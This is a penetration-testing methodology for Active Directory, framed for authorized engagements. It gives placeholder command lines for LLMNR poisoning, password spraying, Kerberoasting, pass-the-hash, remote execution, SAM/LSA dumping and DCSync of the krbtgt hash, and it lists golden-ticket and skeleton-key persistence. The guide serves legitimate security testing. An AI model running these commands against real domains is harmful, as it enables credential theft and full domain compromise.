Active Directory Testing Methodology
Overview
Active Directory (AD) is the backbone of most enterprise Windows environments, managing authentication, authorization, and resource access. Compromising AD often means gaining control of the entire domain. This methodology covers the step-by-step approach to testing AD environments, from initial enumeration through domain compromise.
Prerequisites
Before testing AD:
- Scope confirmation — which domains, forests, and OUs are in scope
- Credentials — starting position (unauthenticated, domain user, or local admin on one workstation)
- Network position — internal network access, VPN, or through a compromised external host
- Restrictions — confirm whether password spraying, Kerberoasting, and DCSync are permitted
- Domain controllers — identify DC IPs and hostnames
Phase 1: Unauthenticated Enumeration
Start without credentials to determine what is exposed.
Network Discovery
# Nmap — find domain controllers and AD services
# https://nmap.org/
nmap -sV -p 53,88,135,139,389,445,464,636,3268,3269 10.0.0.0/24
# Identify DCs by querying DNS for SRV records
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
dig SRV _ldap._tcp.dc._msdcs.<domain>
Null Session Enumeration
# NetExec — test null session
# https://github.com/Pennyw0rth/NetExec
netexec smb <dc> -u '' -p '' --shares
netexec smb <dc> -u '' -p '' --users
netexec smb <dc> -u '' -p '' --groups
# enum4linux-ng — comprehensive null session enumeration
# https://github.com/cddmp/enum4linux-ng
enum4linux-ng -A <dc>
# rpcclient — null session RPC queries
rpcclient -U '' -N <dc> -c 'enumdomusers'
rpcclient -U '' -N <dc> -c 'enumdomgroups'
LLMNR/NBT-NS Poisoning
If on the same network segment, capture credentials via name resolution poisoning:
# Responder — poison LLMNR/NBT-NS/mDNS
# https://github.com/lgandx/Responder
sudo responder -I eth0 -dwv
Captured NTLMv2 hashes can be cracked offline or relayed.
Phase 2: Authenticated Enumeration
Once you have at least one set of domain credentials, enumerate the entire domain.
Domain Reconnaissance
# NetExec — enumerate with credentials
# https://github.com/Pennyw0rth/NetExec
netexec smb <dc> -u <user> -p '<password>' --users
netexec smb <dc> -u <user> -p '<password>' --groups
netexec smb <dc> -u <user> -p '<password>' --shares
# Impacket — get domain users
# https://github.com/fortra/impacket
impacket-lookupsid <domain>/<user>:<password>@<dc>
BloodHound Collection
BloodHound maps AD relationships and identifies attack paths:
# BloodHound — collect all AD data
# https://github.com/SpecterOps/BloodHound
bloodhound-python -u <user> -p '<password>' -d <domain> -dc <dc> -c All
Key BloodHound queries to run:
- Shortest path to Domain Admins
- Users with DCSync rights
- Kerberoastable users
- AS-REP roastable users
- Computers where domain users have local admin
- Users with constrained/unconstrained delegation
LDAP Enumeration
# ldapsearch — query AD via LDAP
ldapsearch -x -H ldap://<dc> -D '<domain>\<user>' -w '<password>' -b 'DC=domain,DC=com' '(objectClass=user)' sAMAccountName
Phase 3: Credential Attacks
Password Spraying
Test a small number of common passwords against all domain users:
# NetExec — password spray (one password at a time to avoid lockout)
# https://github.com/Pennyw0rth/NetExec
netexec smb <dc> -u users.txt -p 'Spring2026!' --continue-on-success
netexec smb <dc> -u users.txt -p 'Password1' --continue-on-success
Check the domain password policy first to avoid lockouts:
# NetExec — get password policy
netexec smb <dc> -u <user> -p '<password>' --pass-pol
Kerberoasting
Request TGS tickets for service accounts and crack them offline:
# Impacket — request Kerberoastable TGS tickets
# https://github.com/fortra/impacket
impacket-GetUserSPNs <domain>/<user>:<password> -dc-ip <dc> -request -outputfile kerberoast.txt
# Hashcat — crack TGS-REP hashes (etype 23)
# https://hashcat.net/hashcat/
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
AS-REP Roasting
Target accounts that do not require Kerberos pre-authentication:
# Impacket — AS-REP roasting
# https://github.com/fortra/impacket
impacket-GetNPUsers <domain>/ -dc-ip <dc> -usersfile users.txt -format hashcat -outputfile asrep.txt
# Hashcat — crack AS-REP hashes (etype 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Phase 4: Lateral Movement
Use compromised credentials to move through the network.
Identifying Targets
# NetExec — find where current user has local admin
# https://github.com/Pennyw0rth/NetExec
netexec smb targets.txt -u <user> -p '<password>' --local-auth
netexec smb targets.txt -u <user> -H '<ntlm_hash>'
Remote Execution Methods
# Impacket — PsExec (creates a service)
# https://github.com/fortra/impacket
impacket-psexec <domain>/<user>:<password>@<target>
# Impacket — WMI execution (no service created)
impacket-wmiexec <domain>/<user>:<password>@<target>
# Impacket — SMBExec
impacket-smbexec <domain>/<user>:<password>@<target>
# Evil-WinRM — PowerShell remoting
# https://github.com/Hackplayers/evil-winrm
evil-winrm -i <target> -u <user> -p '<password>'
# NetExec — execute commands across multiple hosts
netexec smb targets.txt -u <user> -p '<password>' -x 'whoami'
Pass-the-Hash
# NetExec — pass-the-hash
netexec smb <target> -u <user> -H '<ntlm_hash>'
# Impacket — PtH with psexec
impacket-psexec <domain>/<user>@<target> -hashes :<ntlm_hash>
Phase 5: Privilege Escalation to Domain Admin
Credential Dumping
On compromised hosts with local admin access:
# NetExec — dump SAM database
# https://github.com/Pennyw0rth/NetExec
netexec smb <target> -u <admin> -p '<password>' --sam
# NetExec — dump LSA secrets
netexec smb <target> -u <admin> -p '<password>' --lsa
# Impacket — secretsdump (remote, no binary on disk)
# https://github.com/fortra/impacket
impacket-secretsdump <domain>/<admin>:<password>@<target>
ACL Abuse
If BloodHound reveals exploitable ACLs (GenericAll, GenericWrite, WriteDACL, ForceChangePassword on high-value targets):
- GenericAll on user — reset password or set SPN for Kerberoasting
- GenericWrite on user — modify attributes (e.g., set SPN)
- WriteDACL on domain — grant yourself DCSync rights
- ForceChangePassword — change target user's password directly
Delegation Attacks
- Unconstrained delegation — extract TGTs from compromised hosts with unconstrained delegation
- Constrained delegation — use S4U2Self and S4U2Proxy to impersonate users to target services
- Resource-based constrained delegation (RBCD) — if you control a computer object, configure RBCD to impersonate users
DCSync
With sufficient privileges (Replicating Directory Changes):
# Impacket — DCSync to extract all domain hashes
# https://github.com/fortra/impacket
impacket-secretsdump <domain>/<admin>:<password>@<dc>
# Extract specific user (e.g., krbtgt for Golden Ticket)
impacket-secretsdump <domain>/<admin>:<password>@<dc> -just-dc-user krbtgt
Phase 6: Domain Persistence
Document persistence mechanisms without leaving them active. These demonstrate the impact of domain compromise:
- Golden Ticket — forge TGTs using the krbtgt hash (provides unlimited domain access)
- Silver Ticket — forge TGS tickets for specific services
- Skeleton Key — patch LSASS on DC to accept a master password (highly invasive, document only)
- AdminSDHolder — add user to AdminSDHolder ACL for persistent admin access
- DCShadow — register a rogue DC (document only, do not execute without explicit permission)
Reporting Considerations
AD findings should clearly communicate the attack chain:
- Initial access — how credentials were first obtained
- Escalation path — step-by-step from initial user to Domain Admin
- Impact — what domain compromise means for the organization (full control of all Windows systems, email, file shares, etc.)
- Remediation priorities:
- Tier 0 assets (DCs, PKI, AD admin accounts) — remediate first
- Service account passwords — enforce strong, rotated passwords
- Kerberos configuration — disable RC4, enforce AES
- ACL hygiene — remove excessive permissions
- Network segmentation — limit lateral movement paths